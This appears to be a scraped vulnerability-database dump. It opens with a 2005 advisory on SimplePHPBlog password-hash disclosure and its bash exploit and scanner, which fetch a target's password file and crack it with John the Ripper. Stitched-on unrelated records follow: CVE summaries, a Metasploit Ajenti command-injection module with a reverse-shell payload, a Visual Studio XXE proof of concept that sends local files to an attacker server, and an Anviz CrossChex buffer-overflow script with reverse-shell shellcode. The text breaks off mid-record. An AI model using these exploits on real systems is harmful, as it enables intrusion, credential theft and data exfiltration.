ID SECURITYVULNS:DOC:9470 Type securityvulns Reporter Securityvulns Modified 2005-08-14T00:00:00
Description
The following security advisory is sent to the securiteam mailing list,
and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
SimplePHPBlog Password Disclosure (Exploit)
SUMMARY
<http://www.simplephpblog.com/> SimplePHPBlog - "The main advantage of
using <http://www.simplephpblog.com/> Simple PHP Blog is that it only
requires PHP 4 (or greater) and write permission on the server."
A vulnerability in SimplePHPBlog allows remote attackers to cause the
program to disclose its password hash file.
DETAILS
Vulnerable Systems:
* SimplePHPBlog versions 0.4.0 and prior
The information has been provided by <mailto:pjphem@mybox.it> pjphem.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and
body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of
any kind.
In no event shall we be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or
special damages.
{"id": "SECURITYVULNS:DOC:9470", "bulletinFamily": "software", "title": "[EXPL] SimplePHPBlog Password Disclosure (Exploit)", "description": "The following security advisory is sent to the securiteam mailing list,\r\nand can be found at the SecuriTeam web site: http://www.securiteam.com\r\n- - promotion\r\n\r\nThe SecuriTeam alerts list - Free, Accurate, Independent.\r\n\r\nGet your security news from a reliable source.\r\nhttp://www.securiteam.com/mailinglist.html \r\n\r\n- - - - - - - - -\r\n\r\n\r\n\r\n SimplePHPBlog Password Disclosure (Exploit)\r\n------------------------------------------------------------------------\r\n\r\n\r\nSUMMARY\r\n\r\n <http://www.simplephpblog.com/> SimplePHPBlog - "The main advantage of \r\nusing <http://www.simplephpblog.com/> Simple PHP Blog is that it only \r\nrequires PHP 4 (or greater) and write permission on the server."\r\n\r\nA vulnerability in SimplePHPBlog allows remote attackers to cause the \r\nprogram to disclose its password hash file.\r\n\r\nDETAILS\r\n\r\nVulnerable Systems:\r\n * SimplePHPBlog versions 0.4.0 and prior\r\n\r\nVulnerable code:\r\nbash-3.00# cat install02.php\r\n $result = create_folder( 'config' );\r\n\r\nbash-3.00# cat sb_login.php\r\n // If there's no password file then need to redirect them.\r\n $passFile = 'config/password.txt';\r\n\r\n \r\n----------------------------------------------------------------------------------------\r\n function create_password ( $user, $pass ) {\r\n // Generate and store password hash\r\n\r\n $mypasswd = $user.$pass;\r\n $hashed = crypt($mypasswd);\r\n\r\n // Save File\r\n $filename = 'config/password.txt';\r\n $result = sb_write_file( $filename, $hashed );\r\n \r\n----------------------------------------------------------------------------------------\r\n\r\n function check_password ( $user, $pass ) {\r\n // Check password against hashed password file\r\n\r\n $passFile = 'config/password.txt';\r\n $hashed = sb_read_file( $passFile );\r\n\r\nbash-3.00# ls -l `pwd` |grep config\r\n drwxrwxrwx 2 www-data www-data 216 Jul 7 01:13 config\r\n\r\n\r\nExploit:\r\nbash-3.00$ cat 0xfuck-phpblog.sh\r\n#!/bin/bash\r\n##################################\r\n#\r\n# 0xfuck-phpblog.sh - SimplePHPBlog Remote Password Disclosure. (for \r\ndummy)\r\n#\r\n# 0xpjply CONFIDENTIAL - SOURCE MATERIALS\r\n#\r\n# This is published proprietary source code of 0xpjply\r\n#\r\n# (C) COPYRIGHT 0xpjply security guru group, 2005\r\n# All Rights Reserved\r\n#\r\n# dummy exploit written by pjphem && infected on July 2005\r\n#\r\n##################################\r\n# contact:\r\n# pjphem && LazyCrs\r\n#\r\n# pjphem@mybox.it && fLazyCrs@GMail.com\r\n#\r\n#Greetz:\r\n#\r\n# You think you know? You have no idea!\r\n# fluffi-\r\n#\r\n#\r\n#\r\n# RAFA FREE\r\n#\r\n##################################\r\necho ""\r\necho ""\r\necho " +++++++++++++++++++++++++++++ "\r\necho " =: SimplePHPBlog Remote Password Disclosure. - for dummy := \r\n"\r\necho " +++++++++++++++++++++++++++++ "\r\necho ""\r\necho " c0de by pjphem "\r\necho ""\r\necho ""\r\necho " vulnerabili Simple php blog 0.4.4 <= "\r\necho ""\r\necho ""\r\necho -n "inserisci un hostname: " ; read hostname ;\r\necho -n "inserisci dir: " ; read dir ;\r\necho ""\r\necho "[*] praparando l'ambiente..."\r\nmkdir 0xpjply\r\ncd 0xpjply\r\necho -t3 "[*] OK!"\r\necho "[*] Cattura password..."\r\nwget http://$hostname/$dir/config/password.txt\r\necho "[*] OK!"\r\necho ""\r\necho ""\r\necho "Show password: (md5)"\r\necho ""\r\ncat password.txt\r\necho ""\r\nrm -rf password.txt\r\necho ""\r\necho -n "Downloading John The Ripper (password decripter) ?? [Y/n] "\r\nread Q\r\nif [ $Q = y ];\r\n then echo "[*] OK!" ; wget [John the RipperURL]/john.tar.gz\r\nelse\r\n exit 1;\r\n fi\r\ntar -zxf john.tar.gz\r\ncd john\r\necho ""\r\necho "[*] Dowloading password.."\r\necho ""\r\nwget http://$hostname/$dir/config/password.txt\r\necho ""\r\necho "Done!"\r\necho ""\r\necho "STARING John for decript password.. enJoy"\r\n/jonh password.txt\r\necho ""\r\necho ""\r\n\r\nbash-3.00$ cat 0xfuck-phpblog-scanner.sh\r\n#!/bin/bash\r\n#\r\n# Simple tester for phpblog\r\n#\r\n# phpblog 0.4.4 <=\r\n#\r\n####################\r\necho "host , directory blog: (ex. test.it blog)"\r\nread HOST BLOG\r\nlynx -source http://$HOST/$BLOG/config/password.txt | grep $1$ >> 0wn4bl3\r\nbash-3.00$\r\n\r\n\r\nADDITIONAL INFORMATION\r\n\r\nThe information has been provided by <mailto:pjphem@mybox.it> pjphem.\r\n\r\n\r\n\r\n======================================== \r\n\r\n\r\nThis bulletin is sent to members of the SecuriTeam mailing list. \r\nTo unsubscribe from the list, send mail with an empty subject line and\r\nbody to: list-unsubscribe@securiteam.com \r\nIn order to subscribe to the mailing list, simply forward this email to:\r\nlist-subscribe@securiteam.com \r\n\r\n\r\n==================== \r\n==================== \r\n\r\nDISCLAIMER: \r\nThe information in this bulletin is provided "AS IS" without warranty of\r\nany kind. \r\nIn no event shall we be liable for any damages whatsoever including\r\ndirect, indirect, incidental, consequential, loss of business profits or\r\nspecial damages. \r\n\r\n\r\n\r\n", "published": "2005-08-14T00:00:00", "modified": "2005-08-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:9470", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:13", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "2f9b100b24e0d3c5a3633d698d423fc5"}, {"key": "href", "hash": "9ec3485b71fc2c27560685c469597e56"}, {"key": "modified", "hash": "7a1280d607f087b4ad0bbde327dda871"}, {"key": "published", "hash": "7a1280d607f087b4ad0bbde327dda871"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a49ebb2e1a771348dfa0039e0d589df6"}, {"key": "title", "hash": "a301c81f2d5efed7d51dadc05c534c34"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "aa56b1a72b4c8b15d458c8b2f249e933831c165300e17d39e6132890f1d1f900", "viewCount": 10, "enchantments": {"score": {"value": 2.4, "vector": "NONE", "modified": "2018-08-31T11:10:13"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310852529", "OPENVAS:1361412562310852527", "OPENVAS:1361412562310876379"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1485-1", "OPENSUSE-SU-2019:1481-1", "OPENSUSE-SU-2019:1479-1"]}, {"type": "ubuntu", "idList": ["USN-3996-1"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994293"]}, {"type": "zdt", "idList": ["1337DAY-ID-32799", "1337DAY-ID-32775", "1337DAY-ID-32772", "1337DAY-ID-32771", "1337DAY-ID-32767", "1337DAY-ID-32754", "1337DAY-ID-32753", "1337DAY-ID-32757", "1337DAY-ID-32725", "1337DAY-ID-32724"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:152997"]}, {"type": "kitploit", "idList": ["KITPLOIT:3928947731225997712"]}], "modified": "2018-08-31T11:10:13"}, "vulnersScore": 2.4}, "objectVersion": "1.3", "affectedSoftware": []}
{"cve": [{"lastseen": "2019-12-12T12:58:17", "bulletinFamily": "NVD", "description": "Multiple SQL injection vulnerabilities in Zabbix 1.8.x before 1.8.18rc1, 2.0.x before 2.0.9rc1, and 2.1.x before 2.1.7.", "modified": "2019-12-11T21:14:00", "id": "CVE-2013-5743", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5743", "published": "2019-12-11T19:15:00", "title": "CVE-2013-5743", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-12T12:58:15", "bulletinFamily": "NVD", "description": "includes/libs/IEUrlExtension.php in the MediaWiki API in MediaWiki 1.19.x before 1.19.8, 1.20.x before 1.20.7, and 1.21.x before 1.21.2 does not properly detect extensions when there are an even number of \".\" (period) characters in a string, which allows remote attackers to conduct cross-site scripting (XSS) attacks via the siprop parameter in a query action to wiki/api.php.", "modified": "2019-12-11T21:14:00", "id": "CVE-2013-4303", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4303", "published": "2019-12-11T19:15:00", "title": "CVE-2013-4303", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-12T12:58:17", "bulletinFamily": "NVD", "description": "Multiple cross-site scripting (XSS) vulnerabilities in products.php in the Cart66 Lite plugin before 1.5.1.15 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) Product name or (2) Price description fields via a request to wp-admin/admin.php. NOTE: This issue may only cross privilege boundaries if used in combination with CVE-2013-5977.", "modified": "2019-12-11T21:14:00", "id": "CVE-2013-5978", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5978", "published": "2019-12-11T19:15:00", "title": "CVE-2013-5978", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-12T12:58:19", "bulletinFamily": "NVD", "description": "node-connects before 2.8.2 has cross site scripting in Sencha Labs Connect middleware (vulnerability due to incomplete fix for CVE-2013-7370)", "modified": "2019-12-11T16:05:00", "id": "CVE-2013-7371", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-7371", "published": "2019-12-11T15:15:00", "title": "CVE-2013-7371", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-12T12:58:19", "bulletinFamily": "NVD", "description": "node-connect before 2.8.1 has XSS in the Sencha Labs Connect middleware", "modified": "2019-12-11T15:15:00", "id": "CVE-2013-7370", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-7370", "published": "2019-12-11T14:15:00", "title": "CVE-2013-7370", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-11T14:57:12", "bulletinFamily": "NVD", "description": "mod_wsgi module before 3.4 for Apache, when used in embedded mode, might allow remote attackers to obtain sensitive information via the Content-Type header which is generated from memory that may have been freed and then overwritten by a separate thread.", "modified": "2019-12-10T02:13:00", "id": "CVE-2014-0242", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0242", "published": "2019-12-09T20:15:00", "title": "CVE-2014-0242", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-11T14:54:55", "bulletinFamily": "NVD", "description": "chrony before 1.31.1 does not properly protect state variables in authenticated symmetric NTP associations, which allows remote attackers with knowledge of NTP peering to cause a denial of service (inability to synchronize) via random timestamps in crafted NTP data packets.", "modified": "2019-12-09T19:22:00", "id": "CVE-2015-1853", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1853", "published": "2019-12-09T19:15:00", "title": "CVE-2015-1853", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-11T14:58:34", "bulletinFamily": "NVD", "description": "An SQL Injection vulnerability exists in MiniDLNA prior to 1.1.0", "modified": "2019-12-10T15:47:00", "id": "CVE-2013-2745", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2745", "published": "2019-12-04T22:15:00", "title": "CVE-2013-2745", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-12T12:56:55", "bulletinFamily": "NVD", "description": "FreeBSD: Input Validation Flaw allows local users to gain elevated privileges", "modified": "2019-12-11T16:04:00", "id": "CVE-2012-4576", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4576", "published": "2019-12-02T18:15:00", "title": "CVE-2012-4576", "type": "cve", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-12T12:55:38", "bulletinFamily": "NVD", "description": "Path traversal vulnerability in Docker before 1.3.3 allows remote attackers to write to arbitrary files and bypass a container protection mechanism via a full pathname in a symlink in an (1) image or (2) build in a Dockerfile.", "modified": "2019-12-11T20:30:00", "id": "CVE-2014-9356", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9356", "published": "2019-12-02T18:15:00", "title": "CVE-2014-9356", "type": "cve", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:N/C:N/I:C/A:P"}}], "zdt": [{"lastseen": "2019-12-04T16:04:29", "bulletinFamily": "exploit", "description": "This Metasploit module exploits a command injection in Ajenti version 2.1.31. By injecting a command into the username POST parameter to api/core/auth, a shell can be spawned.", "modified": "2019-12-03T00:00:00", "published": "2019-12-03T00:00:00", "id": "1337DAY-ID-33620", "href": "https://0day.today/exploit/description/33620", "title": "Ajenti 2.1.31 Command Injection Exploit", "type": "zdt", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Ajenti auth username Command Injection',\r\n 'Description' => %q{\r\n This module exploits a command injection in Ajenti == 2.1.31.\r\n By injecting a command into the username POST parameter to api/core/auth, a shell can be spawned.\r\n },\r\n 'Author' => [\r\n 'Jeremy Brown', # Vulnerability discovery\r\n 'Onur ER <[email\u00a0protected]>' # Metasploit module\r\n ],\r\n 'References' => [\r\n ['EDB', '47497']\r\n ],\r\n 'DisclosureDate' => '2019-10-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'python',\r\n 'Arch' => ARCH_PYTHON,\r\n 'Privileged' => false,\r\n 'Targets' => [\r\n ['Ajenti == 2.1.31', {}]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'RPORT' => 8000,\r\n 'SSL' => true,\r\n 'payload' => 'python/meterpreter/reverse_tcp'\r\n },\r\n 'DefaultTarget' => 0\r\n ))\r\n register_options([\r\n OptString.new('TARGETURI', [true, 'Base path', '/'])\r\n ])\r\n end\r\n\r\n def check\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => '/view/login/normal'\r\n })\r\n\r\n unless res\r\n vprint_error 'Connection failed'\r\n return CheckCode::Unknown\r\n end\r\n\r\n unless res.body =~ /ajenti/i\r\n return CheckCode::Safe\r\n end\r\n\r\n version = res.body.scan(/'ajentiVersion', '([\\d\\.]+)'/).flatten.first\r\n\r\n if version\r\n vprint_status \"Ajenti version #{version}\"\r\n end\r\n\r\n if version == '2.1.31'\r\n return CheckCode::Appears\r\n end\r\n\r\n CheckCode::Detected\r\n end\r\n\r\n def exploit\r\n print_status('Exploiting...')\r\n json_body = { 'username' => \"`python -c \\\"#{payload.encoded}\\\"`\",\r\n 'password' => rand_text_alpha_lower(7),\r\n 'mode' => 'normal'\r\n }\r\n send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri, 'api', 'core', 'auth'),\r\n 'ctype' => 'application/json',\r\n 'data' => JSON.generate(json_body)\r\n })\r\n end\r\nend\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33620"}, {"lastseen": "2019-12-04T14:10:38", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2019-12-02T00:00:00", "published": "2019-12-02T00:00:00", "id": "1337DAY-ID-33612", "href": "https://0day.today/exploit/description/33612", "title": "Visual Studio 2008 - XML External Entity Injection Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: Visual Studio 2008 - XML External Entity Injection\r\n# Discovery by: hyp3rlinx\r\n# Date: 2019-12-02\r\n# Vendor Homepage: www.microsoft.com\r\n# Software Link: Visual Studio 2008 Express IDE \r\n# Tested Version: 2008\r\n# CVE: N/A\r\n\r\n[+] Credits: John Page (aka hyp3rlinx)\t\t\r\n[+] Website: hyp3rlinx.altervista.org\r\n[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-VISUAL-STUDIO-EXPRESS-2008-IDE-XML-EXTERNAL-ENTITY-0Day.txt\r\n[+] ISR: ApparitionSec \r\n\r\n\r\n[Vendor]\r\nwww.microsoft.com\r\n\r\n\r\n[Product]\r\nVisual Studio 2008 Express IDE \r\nvcsetup.exe\r\nFile hash: 62f764849e8fcdf8bfbc342685641304\r\nDownload: http://go.microsoft.com/?linkid=7729279\r\n\r\n\r\n[Vulnerability Type]\r\nXML External Entity Injection 0Day\r\n\r\n\r\n[CVE Reference]\r\nN/A\r\n\r\n\r\n[Security Issue]\r\nVisual Studio 2008 IDE suffers from XML External Entity injection. Attackers can leverage many file types, some being MASM related files like .asm or .lst.\r\nBy opening any one of the following file types listed below, it can allow remote attackers to steal files from the victims computer, sending them to the\r\nremote attackers server. \r\n\r\nDouble click any of the following extensions and it will trigger the XXE vulnerability. Note, upon installation of the IDE the following file types get \r\nassociated with Visual Studio 2008 and are ALL vulnerable and will trigger the XXE exploit.\r\n\r\n[Vuln XXE file types]\r\n.snippet\r\n.i\r\n.s\r\n.asm\r\n.disco\r\n.lst\r\n.inc\r\n.srf\r\n.wsdl\r\n.rgs\r\n.xml\r\n\r\nThis IDE is pretty old, I know, but its still available for download as of this writing, therefore I release the advisory.\r\n\r\n\r\n[References]\r\nhttps://devblogs.microsoft.com/visualstudio/end-of-support-for-visual-studio-2008-in-one-year/\r\n\r\n\r\n[Exploit/POC]\r\n\"Evil.snippet\" or any of the extensions mentioned above.\r\n\r\n<?xml version=\"1.0\"?>\r\n<!DOCTYPE knobgobslob [ \r\n<!ENTITY % file SYSTEM \"C:\\Windows\\system.ini\">\r\n<!ENTITY % dtd SYSTEM \"http://127.0.0.1:8000/payload.dtd\">\r\n%dtd;]>\r\n<pwn>&send;</pwn>\r\n\r\n\r\n\"payload.dtd\"\r\n\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<!ENTITY % all \"<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>\">\r\n%all;\r\n\r\n\r\npython -m SimpleHTTPServer\r\npython -m http.server (Python3)\r\n\r\n\r\n[POC Video URL]\r\nhttps://www.youtube.com/watch?v=QOZlwzsbPrk\r\n\r\n\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33612"}, {"lastseen": "2019-12-04T02:04:32", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2019-12-02T00:00:00", "published": "2019-12-02T00:00:00", "id": "1337DAY-ID-33614", "href": "https://0day.today/exploit/description/33614", "title": "Anviz CrossChex 4.3.12 - Local Buffer Overflow Exploit", "type": "zdt", "sourceData": "# Exploit Title: Anviz CrossChex 4.3.12 - Local Buffer Overflow\r\n# Exploit Author: Luis Catarino & Pedro Rodrigues\r\n# Vendor Homepage: https://www.anviz.com/\r\n# Software Link: https://www.anviz.com/download.html\r\n# Version: Crosschex Standard x86 <= V4.3.12\r\n# Tested on: 4.3.8.0, 4.3.12\r\n# CVE : N/A\r\n# More info: https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html\r\n\r\nimport socket\r\nimport time\r\nimport sys\r\nimport binascii\r\n\r\n# Scapy for the broadcast packet with custom sport\r\nfrom scapy.all import Raw,IP,Dot1Q,UDP,Ether\r\nimport scapy.all\r\n\r\n# shellcode working calc.exe\r\ncalculator_payload = b\"\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xc0\\x64\\x8b\"\r\ncalculator_payload += b\"\\x50\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\"\r\ncalculator_payload += b\"\\x4a\\x26\\x31\\xff\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\"\r\ncalculator_payload += b\"\\x0d\\x01\\xc7\\xe2\\xf2\\x52\\x57\\x8b\\x52\\x10\\x8b\\x4a\\x3c\"\r\ncalculator_payload += b\"\\x8b\\x4c\\x11\\x78\\xe3\\x48\\x01\\xd1\\x51\\x8b\\x59\\x20\\x01\"\r\ncalculator_payload += b\"\\xd3\\x8b\\x49\\x18\\xe3\\x3a\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\"\r\ncalculator_payload += b\"\\xff\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf6\\x03\\x7d\"\r\ncalculator_payload += b\"\\xf8\\x3b\\x7d\\x24\\x75\\xe4\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\"\r\ncalculator_payload += b\"\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\"\r\ncalculator_payload += b\"\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x5f\"\r\ncalculator_payload += b\"\\x5f\\x5a\\x8b\\x12\\xeb\\x8d\\x5d\\x6a\\x01\\x8d\\x85\\xb2\\x00\"\r\ncalculator_payload += b\"\\x00\\x00\\x50\\x68\\x31\\x8b\\x6f\\x87\\xff\\xd5\\xbb\\xf0\\xb5\"\r\ncalculator_payload += b\"\\xa2\\x56\\x68\\xa6\\x95\\xbd\\x9d\\xff\\xd5\\x3c\\x06\\x7c\\x0a\"\r\ncalculator_payload += b\"\\x80\\xfb\\xe0\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x53\"\r\ncalculator_payload += b\"\\xff\\xd5\\x63\\x61\\x6c\\x63\\x2e\\x65\\x78\\x65\\x00\"\r\n\r\n# shellcode windows x86 reverse_shell\r\nshell_payload_1 = b\"\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xc0\\x64\\x8b\"\r\nshell_payload_1 += b\"\\x50\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\"\r\nshell_payload_1 += b\"\\x4a\\x26\\x31\\xff\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\"\r\nshell_payload_1 += b\"\\x0d\\x01\\xc7\\xe2\\xf2\\x52\\x57\\x8b\\x52\\x10\\x8b\\x4a\\x3c\"\r\nshell_payload_1 += b\"\\x8b\\x4c\\x11\\x78\\xe3\\x48\\x01\\xd1\\x51\\x8b\\x59\\x20\\x01\"\r\nshell_payload_1 += b\"\\xd3\\x8b\\x49\\x18\\xe3\\x3a\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\"\r\nshell_payload_1 += b\"\\xff\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf6\\x03\\x7d\"\r\nshell_payload_1 += b\"\\xf8\\x3b\\x7d\\x24\\x75\\xe4\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\"\r\nshell_payload_1 += b\"\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\"\r\nshell_payload_1 += b\"\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x5f\"\r\nshell_payload_1 += b\"\\x5f\\x5a\\x8b\\x12\\xeb\\x8d\\x5d\\x68\\x33\\x32\\x00\\x00\\x68\"\r\nshell_payload_1 += b\"\\x77\\x73\\x32\\x5f\\x54\\x68\\x4c\\x77\\x26\\x07\\xff\\xd5\\xb8\"\r\nshell_payload_1 += b\"\\x90\\x01\\x00\\x00\\x29\\xc4\\x54\\x50\\x68\\x29\\x80\\x6b\\x00\"\r\nshell_payload_1 += b\"\\xff\\xd5\\x50\\x50\\x50\\x50\\x40\\x50\\x40\\x50\\x68\\xea\\x0f\"\r\nshell_payload_1 += b\"\\xdf\\xe0\\xff\\xd5\\x97\\x6a\\x05\\x68\"\r\n\r\n# shellcode windows x86 reverse_shell (part_2)\r\nshell_payload_2 = b\"\\x68\\x02\\x00\\x01\\xbd\\x89\\xe6\\x6a\\x10\\x56\\x57\\x68\\x99\\xa5\"\r\nshell_payload_2 += b\"\\x74\\x61\\xff\\xd5\\x85\\xc0\\x74\\x0c\\xff\\x4e\\x08\\x75\\xec\"\r\nshell_payload_2 += b\"\\x68\\xf0\\xb5\\xa2\\x56\\xff\\xd5\\x68\\x63\\x6d\\x64\\x00\\x89\"\r\nshell_payload_2 += b\"\\xe3\\x57\\x57\\x57\\x31\\xf6\\x6a\\x12\\x59\\x56\\xe2\\xfd\\x66\"\r\nshell_payload_2 += b\"\\xc7\\x44\\x24\\x3c\\x01\\x01\\x8d\\x44\\x24\\x10\\xc6\\x00\\x44\"\r\nshell_payload_2 += b\"\\x54\\x50\\x56\\x56\\x56\\x46\\x56\\x4e\\x56\\x56\\x53\\x56\\x68\"\r\nshell_payload_2 += b\"\\x79\\xcc\\x3f\\x86\\xff\\xd5\\x89\\xe0\\x4e\\x56\\x46\\xff\\x30\"\r\nshell_payload_2 += b\"\\x68\\x08\\x87\\x1d\\x60\\xff\\xd5\\xbb\\xf0\\xb5\\xa2\\x56\\x68\"\r\nshell_payload_2 += b\"\\xa6\\x95\\xbd\\x9d\\xff\\xd5\\x3c\\x06\\x7c\\x0a\\x80\\xfb\\xe0\"\r\nshell_payload_2 += b\"\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x53\\xff\\xd5\"\r\n\r\ndef ipToShellcode(ip):\r\n a = ip.split('.')\r\n b = hex(int(a[0])) + hex(int(a[1])) + hex(int(a[2])) + hex(int(a[3]))\r\n b = b.replace(\"0x\",\"\")\r\n return binascii.unhexlify(b)\r\n\r\n# sport has to be 5060\r\ndef sendFuzzingUDPBroadcast(ip=\"255.255.255.255\", sport=5050, dport=5060):\r\n request = b\"A\"*77 # Original payload substitute\r\n request += b\"B\"*184\r\n request += b\"\\x07\\x18\\x42\\x00\" # EIP - 00421807 crosscheck_standard.exe\r\n request += b\"A\"*4\r\n # 269 bytes\r\n\r\n if len(sys.argv) > 2:\r\n request = request + shell_payload_1 + ipToShellcode(sys.argv[2]) + shell_payload_2\r\n else:\r\n request = request + calculator_payload\r\n\r\n scapy.all.sendp( Ether(src='00:00:00:00:00:00', dst=\"ff:ff:ff:ff:ff:ff\")/IP(src=ip,dst='255.255.255.255')/UDP(sport=sport,dport=dport)/Raw(load=request), iface=sys.argv[1] )\r\n\r\ndef setFuzzUDPServer(ip='', port=5050, timeout=150):\r\n try :\r\n \ts = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n except:\r\n \tprint('[!] Failed to create server socket')\r\n\r\n try:\r\n \ts.bind(('', port))\r\n except:\r\n \tprint('[*] Server socket bind failed')\r\n \tsys.exit()\r\n\r\n print('[*] Waiting for crosschex')\r\n s.settimeout(timeout)\r\n timeout = time.time() + timeout\r\n responses = []\r\n\r\n while True:\r\n if time.time() > timeout:\r\n break\r\n try:\r\n response = s.recvfrom(1024)\r\n print(response)\r\n responses.append(response)\r\n sendFuzzingUDPBroadcast(ip=ip)\r\n response = s.recvfrom(1024) \r\n except socket.timeout:\r\n print(\"[!] Error with UDP server\")\r\n\r\n s.close()\r\n return responses\r\n\r\nnargs = len(sys.argv)\r\n\r\nif nargs < 2:\r\n print(\"[*] Usage: python3 %s <network_interface> [<ip>]\\n\\tif you don't pass the ip of the LHOST it will drop a calculator, if you set the ip it will send a reverse shell to port 445\")\r\n sys.exit(0)\r\n\r\nsetFuzzUDPServer()\n\n# 0day.today [2019-12-03] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33614"}], "openvas": [{"lastseen": "2019-12-04T15:52:38", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-11-30T00:00:00", "published": "2019-11-30T00:00:00", "id": "OPENVAS:1361412562310892014", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310892014", "title": "Debian LTS Advisory ([SECURITY] [DLA 2014-1] vino security update)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# 